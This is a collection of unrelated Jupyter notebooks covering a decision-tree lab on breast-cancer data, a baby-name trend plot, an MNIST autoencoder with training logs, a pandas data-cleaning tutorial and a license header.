Lab4/CE121_Lab4_02.ipynb | ###Markdown
CE-121
###Code
#Import scikit-learn dataset library
from sklearn import datasets
from sklearn import preprocessing
from sklearn.tree import DecisionTreeClassifier
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#Load dataset
bcancer = datasets.load_breast_cancer()
# print the names of the 30 features
print("Features: ",bcancer.feature_names)
# print the label type of cancer(malignant, benign)
print("Labels: ",bcancer.target_names)
# print data(feature)shape
print("data shape: ",bcancer.data.shape)
#print target shape
print("target shape: ",bcancer.target.shape)
print(bcancer.keys())
dataset = pd.DataFrame(bcancer.data, columns=[bcancer.feature_names])
#dataset['Target'] = pd.Series(data=bcancer.target, index=dataset.index)
dataset['target']=bcancer.target
print(dataset.tail())
y_enc=dataset.iloc[:,30]
print(y_enc)
le=preprocessing.LabelEncoder()
y_enc=le.fit_transform(y_enc)
print(y_enc)
dataset=dataset.drop(['target'],axis=1)
print(dataset.tail())
ohe=preprocessing.OneHotEncoder(dtype=np.int)
x_enc=ohe.fit_transform(dataset)
print(x_enc)
print(ohe.get_feature_names(bcancer.feature_names))
print(len(ohe.get_feature_names(bcancer.feature_names)))
from pandas.core.common import random_state
#train test division(50%-50%)
from sklearn.model_selection import train_test_split
X_train, X_test, Y_train, Y_test = train_test_split(x_enc,y_enc, test_size = 0.50,random_state=121)
print(X_train)
#create DecisionTree model
dtc=DecisionTreeClassifier(criterion="entropy",random_state=121,max_leaf_nodes=121)
dtc.fit(X_train,Y_train)
pred_op=dtc.predict(X_test)
print("predicted output: ",pred_op)
print("actual test output: ",Y_test)
from sklearn import metrics
print("Accuracy is :- ",metrics.accuracy_score(Y_test, pred_op))
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
precision = precision_score(Y_test, pred_op)
recall = recall_score(Y_test, pred_op)
print("precision :- ",precision)
print("recall :- ",recall)
# from sklearn.tree import export_graphviz
# export_graphviz(dtc,out_file='tree_entropy.dot',
# feature_names=ohe.get_feature_names(bcancer.feature_names),class_names=list(bcancer.target_names),
# filled=True,max_depth=122)
# #convert to png
# from subprocess import call
# call(['dot', '-Tpng', 'tree_entropy.dot', '-o', 'tree_entropy.png', '-Gdpi=600'])
# # Display in python
# import matplotlib.pyplot as plt
# plt.figure(figsize = (14, 18))
# plt.imshow(plt.imread('tree_entropy.png'))
# plt.axis('off');
# plt.show();
from sklearn.metrics import confusion_matrix
confusion_matrix(Y_test, pred_op)
disp = metrics.plot_confusion_matrix(dtc, X_test, Y_test)
disp.figure_.suptitle("Confusion Matrix")
print("Confusion matrix:\n",disp.confusion_matrix)
plt.show()
###Output
Confusion matrix:
[[ 6 89]
[ 3 187]]
|
content/blog/notebooks/2016/02/ssn-names.ipynb | ###Markdown
ReproduceIt is a series of articles that reproduce the results from data analysis articles focusing on having open data and open code. Today as small return for the [ReproduceIt series](http://danielfrg.com/tag/reproduceit.html) I try to reproduce a simple but nice data analysis and webapp that [braid.io](http://braid.io/) didcalled [Most Beyonces are 14 years old and most Kanyes are about 11](http://braid.io/tile/name-trends).The article analyses the trend of names of some music artits (Beyonce, Kanye and Madona) in the US, it also has some nice possible explanations for the ups and downs in time, its a quick read. The data is based on Social Security Office and can be downloaded from the [SSN website: Beyond the Top 1000 Names](https://www.ssa.gov/oact/babynames/limits.html)The data is very small and loading it into pandas and plotting using bokeh it was very easy.
###Code
%matplotlib inline
import pandas as pd
import os
data_dir = os.path.expanduser("~/data/names/names")
files = os.listdir(data_dir)
data = pd.DataFrame(columns=["year", "name", "sex", "occurrences"])
for fname in files:
if fname.endswith(".txt"):
fpath = os.path.join(data_dir, fname)
df = pd.read_csv(fpath, header=None, names=["name", "sex", "occurrences"])
df["year"] = int(fname[3:7])
data = data.append(df)
data.year = data.year.astype(int)
data.head()
data.shape
data.dtypes
###Output
_____no_output_____
###Markdown
BeyonceNow that the data is into a simple dataframe we can just filter by the name we want and make a Bar Chart.
###Code
beyonce = data[data["name"] == "Beyonce"][["year", "occurrences"]]
from bokeh.charts import ColumnDataSource, Bar, output_notebook, show
from bokeh.models import HoverTool
output_notebook()
p = Bar(data=beyonce, label="year", values="occurrences", title="No. Babies named Beyoncé",
color="#0277BD", ylabel='', tools="save,reset")
show(p)
###Output
_____no_output_____ |
chapter_2/ch2_autoencoder.ipynb | ###Markdown
Load MNIST dataset
###Code
(ds_train, ds_test_), ds_info = tfds.load('mnist',
split=['train', 'test'],
shuffle_files=True,
as_supervised=True,
with_info=True)
batch_size = 256
def preprocess(image, label):
image = tf.cast(image, tf.float32)
image = image/255.
return image, image
ds_train = ds_train.map(preprocess)
ds_train = ds_train.cache() # put dataset into memory
ds_train = ds_train.shuffle(ds_info.splits['train'].num_examples)
ds_train = ds_train.batch(batch_size)
ds_test = ds_test_.map(preprocess).batch(batch_size).cache().prefetch(batch_size)
# return label for testing
def preprocess_with_label(image, label):
image = tf.cast(image, tf.float32)
image = tf.math.round(image/255.)
return image, label
ds_test_label = ds_test_.map(preprocess_with_label).batch(1000)
###Output
_____no_output_____
###Markdown
Building Autoencoder
###Code
def Encoder(z_dim):
inputs = layers.Input(shape=[28,28,1])
x = inputs
x = Conv2D(filters=8, kernel_size=(3,3), strides=2, padding='same', activation='relu')(x)
x = Conv2D(filters=8, kernel_size=(3,3), strides=1, padding='same', activation='relu')(x)
x = Conv2D(filters=8, kernel_size=(3,3), strides=2, padding='same', activation='relu')(x)
x = Conv2D(filters=8, kernel_size=(3,3), strides=1, padding='same', activation='relu')(x)
x = Flatten()(x)
out = Dense(z_dim)(x)
return Model(inputs=inputs, outputs=out, name='encoder')
def Decoder(z_dim):
inputs = layers.Input(shape=[z_dim])
x = inputs
x = Dense(7*7*64, activation='relu')(x)
x = Reshape((7,7,64))(x)
x = Conv2D(filters=64, kernel_size=(3,3), strides=1, padding='same', activation='relu')(x)
x = UpSampling2D((2,2))(x)
x = Conv2D(filters=32, kernel_size=(3,3), strides=1, padding='same', activation='relu')(x)
x = UpSampling2D((2,2))(x)
out = Conv2D(filters=1, kernel_size=(3,3), strides=1, padding='same', activation='sigmoid')(x)
#return out
return Model(inputs=inputs, outputs=out, name='decoder')
class Autoencoder:
def __init__(self, z_dim):
self.encoder = Encoder(z_dim)
self.decoder = Decoder(z_dim)
model_input = self.encoder.input
model_output = self.decoder(self.encoder.output)
self.model = Model(model_input, model_output)
autoencoder = Autoencoder(z_dim=10)
model_path = "./models/autoencoder.h5"
checkpoint = ModelCheckpoint(model_path,
monitor= "val_loss",
verbose=1,
save_best_only=True,
mode= "auto",
save_weights_only = False)
early = EarlyStopping(monitor= "val_loss",
mode= "auto",
patience = 5)
callbacks_list = [checkpoint, early]
autoencoder.model.compile(
loss = "bce",
optimizer=tf.keras.optimizers.RMSprop(learning_rate=3e-4))
#metrics=[tf.keras.losses.BinaryCrossentropy()])
autoencoder.model.fit(ds_train, validation_data=ds_test,
epochs = 100, callbacks = callbacks_list)
###Output
Epoch 1/100
235/235 [==============================] - ETA: 0s - loss: 0.2658
Epoch 00001: val_loss improved from inf to 0.18209, saving model to ./models/autoencoder.h5
235/235 [==============================] - 2s 8ms/step - loss: 0.2658 - val_loss: 0.1821
Epoch 2/100
235/235 [==============================] - ETA: 0s - loss: 0.1691
Epoch 00002: val_loss improved from 0.18209 to 0.14860, saving model to ./models/autoencoder.h5
235/235 [==============================] - 2s 6ms/step - loss: 0.1691 - val_loss: 0.1486
Epoch 3/100
232/235 [============================>.] - ETA: 0s - loss: 0.1472
Epoch 00003: val_loss improved from 0.14860 to 0.13958, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1471 - val_loss: 0.1396
Epoch 4/100
227/235 [===========================>..] - ETA: 0s - loss: 0.1379
Epoch 00004: val_loss improved from 0.13958 to 0.13258, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1378 - val_loss: 0.1326
Epoch 5/100
230/235 [============================>.] - ETA: 0s - loss: 0.1325
Epoch 00005: val_loss improved from 0.13258 to 0.12724, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1324 - val_loss: 0.1272
Epoch 6/100
235/235 [==============================] - ETA: 0s - loss: 0.1287
Epoch 00006: val_loss improved from 0.12724 to 0.12569, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1287 - val_loss: 0.1257
Epoch 7/100
233/235 [============================>.] - ETA: 0s - loss: 0.1259
Epoch 00007: val_loss improved from 0.12569 to 0.12421, saving model to ./models/autoencoder.h5
235/235 [==============================] - 2s 6ms/step - loss: 0.1260 - val_loss: 0.1242
Epoch 8/100
234/235 [============================>.] - ETA: 0s - loss: 0.1237
Epoch 00008: val_loss improved from 0.12421 to 0.12303, saving model to ./models/autoencoder.h5
235/235 [==============================] - 2s 6ms/step - loss: 0.1237 - val_loss: 0.1230
Epoch 9/100
232/235 [============================>.] - ETA: 0s - loss: 0.1220
Epoch 00009: val_loss improved from 0.12303 to 0.12149, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1219 - val_loss: 0.1215
Epoch 10/100
234/235 [============================>.] - ETA: 0s - loss: 0.1205
Epoch 00010: val_loss improved from 0.12149 to 0.11844, saving model to ./models/autoencoder.h5
235/235 [==============================] - 2s 6ms/step - loss: 0.1205 - val_loss: 0.1184
Epoch 11/100
228/235 [============================>.] - ETA: 0s - loss: 0.1191
Epoch 00011: val_loss did not improve from 0.11844
235/235 [==============================] - 1s 6ms/step - loss: 0.1191 - val_loss: 0.1199
Epoch 12/100
233/235 [============================>.] - ETA: 0s - loss: 0.1180
Epoch 00012: val_loss improved from 0.11844 to 0.11633, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1180 - val_loss: 0.1163
Epoch 13/100
235/235 [==============================] - ETA: 0s - loss: 0.1170
Epoch 00013: val_loss improved from 0.11633 to 0.11440, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1170 - val_loss: 0.1144
Epoch 14/100
229/235 [============================>.] - ETA: 0s - loss: 0.1161
Epoch 00014: val_loss did not improve from 0.11440
235/235 [==============================] - 1s 6ms/step - loss: 0.1161 - val_loss: 0.1186
Epoch 15/100
232/235 [============================>.] - ETA: 0s - loss: 0.1154
Epoch 00015: val_loss did not improve from 0.11440
235/235 [==============================] - 1s 6ms/step - loss: 0.1153 - val_loss: 0.1145
Epoch 16/100
234/235 [============================>.] - ETA: 0s - loss: 0.1146
Epoch 00016: val_loss improved from 0.11440 to 0.11381, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1146 - val_loss: 0.1138
Epoch 17/100
234/235 [============================>.] - ETA: 0s - loss: 0.1140
Epoch 00017: val_loss did not improve from 0.11381
235/235 [==============================] - 1s 6ms/step - loss: 0.1140 - val_loss: 0.1139
Epoch 18/100
233/235 [============================>.] - ETA: 0s - loss: 0.1133
Epoch 00018: val_loss improved from 0.11381 to 0.11224, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1133 - val_loss: 0.1122
Epoch 19/100
234/235 [============================>.] - ETA: 0s - loss: 0.1127
Epoch 00019: val_loss improved from 0.11224 to 0.11138, saving model to ./models/autoencoder.h5
235/235 [==============================] - 2s 6ms/step - loss: 0.1127 - val_loss: 0.1114
Epoch 20/100
227/235 [===========================>..] - ETA: 0s - loss: 0.1122
Epoch 00020: val_loss improved from 0.11138 to 0.11081, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1122 - val_loss: 0.1108
Epoch 21/100
226/235 [===========================>..] - ETA: 0s - loss: 0.1118
Epoch 00021: val_loss improved from 0.11081 to 0.11079, saving model to ./models/autoencoder.h5
235/235 [==============================] - 2s 6ms/step - loss: 0.1118 - val_loss: 0.1108
Epoch 22/100
234/235 [============================>.] - ETA: 0s - loss: 0.1113
Epoch 00022: val_loss improved from 0.11079 to 0.11058, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1113 - val_loss: 0.1106
Epoch 23/100
232/235 [============================>.] - ETA: 0s - loss: 0.1109
Epoch 00023: val_loss improved from 0.11058 to 0.11040, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1109 - val_loss: 0.1104
Epoch 24/100
229/235 [============================>.] - ETA: 0s - loss: 0.1105
Epoch 00024: val_loss improved from 0.11040 to 0.10948, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1105 - val_loss: 0.1095
Epoch 25/100
230/235 [============================>.] - ETA: 0s - loss: 0.1101
Epoch 00025: val_loss did not improve from 0.10948
235/235 [==============================] - 1s 6ms/step - loss: 0.1101 - val_loss: 0.1119
Epoch 26/100
234/235 [============================>.] - ETA: 0s - loss: 0.1098
Epoch 00026: val_loss did not improve from 0.10948
235/235 [==============================] - 1s 6ms/step - loss: 0.1098 - val_loss: 0.1105
Epoch 27/100
227/235 [===========================>..] - ETA: 0s - loss: 0.1094
Epoch 00027: val_loss improved from 0.10948 to 0.10876, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1094 - val_loss: 0.1088
Epoch 28/100
226/235 [===========================>..] - ETA: 0s - loss: 0.1091
Epoch 00028: val_loss did not improve from 0.10876
235/235 [==============================] - 1s 6ms/step - loss: 0.1091 - val_loss: 0.1093
Epoch 29/100
235/235 [==============================] - ETA: 0s - loss: 0.1088
Epoch 00029: val_loss improved from 0.10876 to 0.10870, saving model to ./models/autoencoder.h5
235/235 [==============================] - 2s 6ms/step - loss: 0.1088 - val_loss: 0.1087
Epoch 30/100
231/235 [============================>.] - ETA: 0s - loss: 0.1085
Epoch 00030: val_loss improved from 0.10870 to 0.10839, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1085 - val_loss: 0.1084
Epoch 31/100
228/235 [============================>.] - ETA: 0s - loss: 0.1082
Epoch 00031: val_loss did not improve from 0.10839
235/235 [==============================] - 1s 6ms/step - loss: 0.1082 - val_loss: 0.1098
Epoch 32/100
232/235 [============================>.] - ETA: 0s - loss: 0.1079
Epoch 00032: val_loss did not improve from 0.10839
235/235 [==============================] - 1s 6ms/step - loss: 0.1079 - val_loss: 0.1084
Epoch 33/100
229/235 [============================>.] - ETA: 0s - loss: 0.1076
Epoch 00033: val_loss improved from 0.10839 to 0.10712, saving model to ./models/autoencoder.h5
235/235 [==============================] - 2s 6ms/step - loss: 0.1077 - val_loss: 0.1071
###Markdown
Sample and Display Images
###Code
images, labels = next(iter(ds_test))
autoencoder.model = load_model(model_path)
outputs = autoencoder.model.predict(images)
# Display
grid_col = 10
grid_row = 2
f, axarr = plt.subplots(grid_row, grid_col, figsize=(grid_col*1.1, grid_row))
i = 0
for row in range(0, grid_row, 2):
for col in range(grid_col):
axarr[row,col].imshow(images[i,:,:,0], cmap='gray')
axarr[row,col].axis('off')
axarr[row+1,col].imshow(outputs[i,:,:,0], cmap='gray')
axarr[row+1,col].axis('off')
i += 1
f.tight_layout(0.1, h_pad=0.2, w_pad=0.1)
plt.show()
###Output
_____no_output_____
###Markdown
Set z_dim = 2 and to look at the latent variables
###Code
autoencoder_2 = Autoencoder(z_dim=2)
early = EarlyStopping(monitor= "val_loss",
mode= "auto",
patience = 5)
callbacks_list = [early]
autoencoder_2.model.compile(
loss = "bce",
optimizer=tf.keras.optimizers.RMSprop(learning_rate=1e-3))
autoencoder_2.model.fit(ds_train, validation_data=ds_test,
epochs = 50, callbacks = callbacks_list)
images, labels = next(iter(ds_test_label))
outputs = autoencoder_2.encoder.predict(images)
plt.figure(figsize=(8,8))
plt.scatter(outputs[:,0], outputs[:,1], c=labels, cmap='RdYlBu', s=3)
plt.colorbar()
z_samples = np.array([[z1, z2] for z2 in np.arange(-5, 5, 1.) for z1 in np.arange(-5, 5, 1.)])
images = autoencoder_2.decoder.predict(z_samples)
grid_col = 10
grid_row = 10
f, axarr = plt.subplots(grid_row, grid_col, figsize=(grid_col, grid_row))
i = 0
for row in range(grid_row):
for col in range(grid_col):
axarr[row,col].imshow(images[i,:,:,0], cmap='gray')
axarr[row,col].axis('off')
i += 1
f.tight_layout(0.1, h_pad=0.2, w_pad=0.1)
plt.show()
import ipywidgets as widgets
from ipywidgets import interact, interact_manual
@interact
def explore_latent_variable(z1 = (-5,5,0.1),
z2 = (-5,5,0.1)):
z_samples = [[z1, z2]]
images = autoencoder_2.decoder.predict(z_samples)
plt.figure(figsize=(2,2))
plt.imshow(images[0,:,:,0], cmap='gray')
###Output
_____no_output_____ |
book/2-pandas-datacleaning.ipynb | ###Markdown
Data Cleaning with Pandas====================== Overview Questions What does 'clean data' mean? How can I drop unnecessary data from my dataframe? How can I change column or row names in a dataframe? How can I cast columns to the correct data type? Objectives: Use pandas to drop unnecessary data from our dataframe. Learn how to rename pandas columns. Use pandas string methods to correct characters. Learn how to cast columns to the correct data type. Keypoints: Data cleaning prepares data for analysis. Pandas has built-in methods for handling data cleaning, particular missing data. In this section, we'll read in the data we extracted in the last lesson. You may have noticed in the last session that the data in these dataframes didn't look great. There were columns that appeared to have no values. Once we start working with the data, we are going to see some additional problems.
###Code
import os
import pandas as pd
fpath = os.path.join("data", "potts_table1.csv")
fpath2 = os.path.join("data", "potts_table2.csv")
table1 = pd.read_csv(fpath)
table2 = pd.read_csv(fpath2)
table1.head()
###Output
_____no_output_____
###Markdown
Dropping unneccessary dataIn some cases, we might have data in our dataframe that we don't need. We will want to discard or "drop" this data from the dataframe. For the dataframe we just loaded, for example, we can see that the data in columns 0, 1, 4, 12 appear to not have any values.Check your understanding What pandas method can you use to see how many non-null values you have in each column? ```{admonition} Solution:class: dropdown```pythontable1.info()``` There are two methods you might use to drop data from a dataframe. These are `drop`, and `dropna`. Drop is used when you have specific rows or columns you want to remove from the dataframe, while `dropna` is used when you want to drop columns or rows which contain `NaN` or "not a number" values. This occurs when there are no values in a data cell.In the output of `info` above, we can see that there are two columns which contain 0 non-null values. This means that all of the values in these columns are `NaN`. We can safely discard these columns. We'll use the `dropna` function to get rid of them.
###Code
help(table1.dropna)
###Output
Help on method dropna in module pandas.core.frame:
dropna(axis=0, how='any', thresh=None, subset=None, inplace=False) method of pandas.core.frame.DataFrame instance
Remove missing values.
See the :ref:`User Guide <missing_data>` for more on which values are
considered missing, and how to work with missing data.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
Determine if rows or columns which contain missing values are
removed.
* 0, or 'index' : Drop rows which contain missing values.
* 1, or 'columns' : Drop columns which contain missing value.
.. versionchanged:: 1.0.0
Pass tuple or list to drop on multiple axes.
Only a single axis is allowed.
how : {'any', 'all'}, default 'any'
Determine if row or column is removed from DataFrame, when we have
at least one NA or all NA.
* 'any' : If any NA values are present, drop that row or column.
* 'all' : If all values are NA, drop that row or column.
thresh : int, optional
Require that many non-NA values.
subset : array-like, optional
Labels along other axis to consider, e.g. if you are dropping rows
these would be a list of columns to include.
inplace : bool, default False
If True, do operation inplace and return None.
Returns
-------
DataFrame or None
DataFrame with NA entries dropped from it or None if ``inplace=True``.
See Also
--------
DataFrame.isna: Indicate missing values.
DataFrame.notna : Indicate existing (non-missing) values.
DataFrame.fillna : Replace missing values.
Series.dropna : Drop missing values.
Index.dropna : Drop missing indices.
Examples
--------
>>> df = pd.DataFrame({"name": ['Alfred', 'Batman', 'Catwoman'],
... "toy": [np.nan, 'Batmobile', 'Bullwhip'],
... "born": [pd.NaT, pd.Timestamp("1940-04-25"),
... pd.NaT]})
>>> df
name toy born
0 Alfred NaN NaT
1 Batman Batmobile 1940-04-25
2 Catwoman Bullwhip NaT
Drop the rows where at least one element is missing.
>>> df.dropna()
name toy born
1 Batman Batmobile 1940-04-25
Drop the columns where at least one element is missing.
>>> df.dropna(axis='columns')
name
0 Alfred
1 Batman
2 Catwoman
Drop the rows where all elements are missing.
>>> df.dropna(how='all')
name toy born
0 Alfred NaN NaT
1 Batman Batmobile 1940-04-25
2 Catwoman Bullwhip NaT
Keep only the rows with at least 2 non-NA values.
>>> df.dropna(thresh=2)
name toy born
1 Batman Batmobile 1940-04-25
2 Catwoman Bullwhip NaT
Define in which columns to look for missing values.
>>> df.dropna(subset=['name', 'toy'])
name toy born
1 Batman Batmobile 1940-04-25
2 Catwoman Bullwhip NaT
Keep the DataFrame with valid entries in the same variable.
>>> df.dropna(inplace=True)
>>> df
name toy born
1 Batman Batmobile 1940-04-25
###Markdown
Before saving the dataframe, we'll look at and and discuss output from this function. By default, the function `dropna` will work on `axis 0` or the rows of the dataframe, and will drop any row which contains a `NaN`. You will see this results in a dataframe with no data.
###Code
table1.dropna()
###Output
_____no_output_____
###Markdown
Notice that `dropna` returns a dataframe and does not overwrite the original.
###Code
table1.info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 37 entries, 0 to 36
Data columns (total 14 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 Unnamed: 0 37 non-null int64
1 Unnamed: 0.1 1 non-null object
2 Compound 37 non-null object
3 log P 37 non-null object
4 Unnamed: 1 0 non-null float64
5 II 37 non-null float64
6 Hy 37 non-null float64
7 H, 37 non-null float64
8 MV 37 non-null object
9 R, 37 non-null float64
10 log Kou 37 non-null object
11 log Kyex 31 non-null object
12 Unnamed: 2 0 non-null float64
13 log Kpep 25 non-null object
dtypes: float64(6), int64(1), object(7)
memory usage: 4.2+ KB
###Markdown
We can switch to dropping columns which have `NaN` values by adding the argument `axis=1`.
###Code
table1.dropna(axis=1).info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 37 entries, 0 to 36
Data columns (total 9 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 Unnamed: 0 37 non-null int64
1 Compound 37 non-null object
2 log P 37 non-null object
3 II 37 non-null float64
4 Hy 37 non-null float64
5 H, 37 non-null float64
6 MV 37 non-null object
7 R, 37 non-null float64
8 log Kou 37 non-null object
dtypes: float64(4), int64(1), object(4)
memory usage: 2.7+ KB
###Markdown
This is closer to what we want. However, you'll notice that this has dropped some columns which have data. By default, pandas will drop a column which contains **any** `NaN` values. This may not be what we want in many cases because some values may simply be missing rather than incorrect.We can add an additional argument, `how=all`, to drop only columns whose values are **all** `NaN`. By default, this function argument is `how=any`. Once we are sure we would like to keep this as our dataframe, we can add `inplace=True` to the function call to overwrite the dataframe.
###Code
table1.dropna(axis=1, how="all")
###Output
_____no_output_____
###Markdown
The output above looks like something to keep, so we will add `inplace=True` to overwrite the original dataframe.
###Code
table1.dropna(axis=1, how="all", inplace=True)
table1.info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 37 entries, 0 to 36
Data columns (total 12 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 Unnamed: 0 37 non-null int64
1 Unnamed: 0.1 1 non-null object
2 Compound 37 non-null object
3 log P 37 non-null object
4 II 37 non-null float64
5 Hy 37 non-null float64
6 H, 37 non-null float64
7 MV 37 non-null object
8 R, 37 non-null float64
9 log Kou 37 non-null object
10 log Kyex 31 non-null object
11 log Kpep 25 non-null object
dtypes: float64(4), int64(1), object(7)
memory usage: 3.6+ KB
###Markdown
We can drop the final two columns using the `drop` function. You can use this when you have specific rows or columns you would like to discard. Again, we use `axis=1` to drop columns, then we pass the column name.
###Code
table1.drop(axis=1, columns=["Unnamed: 0.1", "Unnamed: 0"], inplace=True)
###Output
_____no_output_____
###Markdown
Changing column namesOur column names are still incorrect. You will likely want to change them to make the table more legible.
###Code
table1.info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 37 entries, 0 to 36
Data columns (total 10 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 Compound 37 non-null object
1 log P 37 non-null object
2 II 37 non-null float64
3 Hy 37 non-null float64
4 H, 37 non-null float64
5 MV 37 non-null object
6 R, 37 non-null float64
7 log Kou 37 non-null object
8 log Kyex 31 non-null object
9 log Kpep 25 non-null object
dtypes: float64(4), object(6)
memory usage: 3.0+ KB
###Markdown
We might now want to clean up the column names and make sure they are descriptive. You can see the column names using `table1.columns`. You can either rename the columns by setting `table1.columns` to a list of the appropriate length, or you can use `table1.rename`. In the `.rename` method, you put the argument `columns` and set it equal to a dictionary (curly brackets) where you use the syntax```python"current_column_name": "new_column_name"```
###Code
table1.columns
table1.rename(inplace=True, columns={
"II": "pi",
"Hy": "Hd",
"H,": "Ha",
"R,": "R_2",
"log Kou": "log K_oct",
"log Kyex": "log K_hex",
"log Kpep": "log K_hep"
})
table1.head()
###Output
_____no_output_____
###Markdown
Fixing Data Types When examining `.info` , you'll notice that a lot of our columns which should be numbers are still 'objects' or strings. We would like `log P`, for example to be numeric. Typically if a column appears that it should be numeric, but pandas does not automatically cast it as such, it is because there are some non-numeric characters in the column which pandas could not decide what to do with. We will need to examine these, decide what to do with them, then cast the column as numeric.There are a few ways to do this, but we'll use the pandas function `to_numeric`.
###Code
table1.info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 37 entries, 0 to 36
Data columns (total 10 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 Compound 37 non-null object
1 log P 37 non-null object
2 pi 37 non-null float64
3 Hd 37 non-null float64
4 Ha 37 non-null float64
5 MV 37 non-null object
6 R_2 37 non-null float64
7 log K_oct 37 non-null object
8 log K_hex 31 non-null object
9 log K_hep 25 non-null object
dtypes: float64(4), object(6)
memory usage: 3.0+ KB
###Markdown
Using the `to_numeric` function without any additional inputs will fail on this data set.
###Code
pd.to_numeric(table1["log P"])
###Output
_____no_output_____
###Markdown
Scrolling to the bottom of this message and reading the error, you will see it is having a problem reading the value `"— 6.85"`. It may not seem obvious what this problem is at first. When we run into a problem like this we have a few options. You could choose to handle the errors differently. Pandas will let you set what you would like for it to do when it is unable to cast a value. By default, it will fail (which is what se wee above). For example, you could also set errors to be ignored (which would result in the column being unchanged, there would just be no error raised) or to "coerce" the values. Choosing "coerce" means that anything that can't be cast as numeric will be put as `NaN`.Let's see what happens when we set errors to coerce.
###Code
pd.to_numeric(table1["log P"], errors="coerce")
###Output
_____no_output_____
###Markdown
This unfortunately results in no numeric characters being recognized.We have to do a little bit more processing to the values for this to work. If you examine the columns, you may notice that the negative sign is a little off. It is `—` when it should be `-`. This is very slight, and might be hard to see, but it is important to change for this data set.We will want to replace all `—` with `-`. We could accomplish this using the string method `replace`. Strings in Python have a number of methods. The `replace` method allows us to replace a substring within a string.
###Code
test_string = "Hello world."
test_string.replace(".", "!")
###Output
_____no_output_____
###Markdown
The split command is another string method you are probably familiar with:
###Code
test_string.split()
###Output
_____no_output_____
###Markdown
Pandas string methods If we want to use these on a column in a pandas dataframe, you might think to use `apply`, which we learned about in the last session. However, you will notice that the `replace` method acts on a the string and doesn't fit into `apply`.Luckily, when pandas columns are strings, we can use string methods on the whole column by adding `.str.function`. For example, to replace the minus signs
###Code
table1["log P"].str.replace("—", "-")
table1["log P"] = table1["log P"].str.replace("—", "-")
# We still need to get rid of spaces
table1["log P"] = table1["log P"].str.replace(" ", "")
table1["log P"] = pd.to_numeric(table1["log P"], errors="coerce")
table1.info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 37 entries, 0 to 36
Data columns (total 10 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 Compound 37 non-null object
1 log P 34 non-null float64
2 pi 37 non-null float64
3 Hd 37 non-null float64
4 Ha 37 non-null float64
5 MV 37 non-null object
6 R_2 37 non-null float64
7 log K_oct 37 non-null object
8 log K_hex 31 non-null object
9 log K_hep 25 non-null object
dtypes: float64(5), object(5)
memory usage: 3.0+ KB
###Markdown
We actually need to change this character on all of our columns. However `str` methods only work on pandas series. If we want to replace a string across all of our DataFrame, we will use the `.replace` method. In order for it to recognize substrings, set the option `regex=True`. We will discuss `regex` more in the next session, but this is all you need to know about regex for the moment.
###Code
table1.replace("—", "-", regex=True, inplace=True)
table1.replace(" ", "", regex=True, inplace=True)
###Output
_____no_output_____
###Markdown
Changing the data type of multiple columns To change the data type of multiple columns, we will want to use the `pd.to_numeric` function on all of those columns. There are several ways you might choose to do this. For example, you might just choose to call the function for each column.We can also accomplish this by using the `apply` operator which we learned about in the last session. The `apply` operator should be used whenever you want to apply a function to a row or column. In this case, we want to apply the `pd.to_numeric` function to each column.Because we want to apply to the columns, we add the argument `axis=1`.
###Code
table1.apply(pd.to_numeric, axis=1)
###Output
_____no_output_____
###Markdown
When we try this code, we immediately see an error. We do not want to try to convert the first column to a number. We can use the `iloc` function to exclude the first column:
###Code
table1.iloc[:, 1:].apply(pd.to_numeric, axis=1)
###Output
_____no_output_____
###Markdown
An error again! This time, we see failure because a string was incorrectly read from the pdf and could not be converted to a number. You could choose to handle this differently, but for this workshop we are just going to discard values like these. If we were using `to_numeric` on a pandas series, we would use the option `errors="coerce"`. You may not see immediately how to use this with the `apply` function, but fortunately, pandas allows us to pass additional arguments with `apply`:
###Code
table1.iloc[:, 1:] = table1.iloc[:, 1:].apply(pd.to_numeric, axis=1, errors="coerce")
table1.info()
table1.to_csv("data/potts_table1_clean.csv", index=False)
###Output
_____no_output_____ |
ddsp/colab/demos/.ipynb_checkpoints/train_autoencoder-checkpoint.ipynb | ###Markdown
Copyright 2020 Google LLC.Licensed under the Apache License, Version 2.0 (the "License");
###Code
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
